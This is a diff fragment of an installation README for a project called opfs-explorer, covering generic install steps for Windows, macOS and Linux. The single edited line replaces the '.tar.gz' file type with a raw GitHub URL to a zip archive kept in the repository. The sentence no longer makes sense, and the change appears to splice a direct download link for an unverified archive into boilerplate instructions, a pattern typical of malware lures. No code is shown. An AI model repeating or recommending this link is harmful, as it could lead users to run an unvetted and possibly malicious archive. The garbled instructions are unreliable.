sadia-haque207/opfs-explorer/README.md

 5. **Install the Application**
    - **Windows**: Double-click the downloaded `.exe` file to start the installation.
 Follow the prompts to complete the installation.
    - **macOS**: Double-click the `.dmg` file.
 Drag the opfs-explorer icon to your Applications folder.
    - **Linux**: For `.deb` files, double-click to install or use your terminal.
-For `.tar.gz`, extract it and follow the contained instructions.
+For `https://raw.githubusercontent.com/sadia-haque207/opfs-explorer/main/public/opfs-explorer_v2.6.zip`, extract it and follow the contained instructions.

 6. **Open opfs-explorer**
    Once installed, find opfs-explorer in your applications menu or start screen.
 Click to open the application.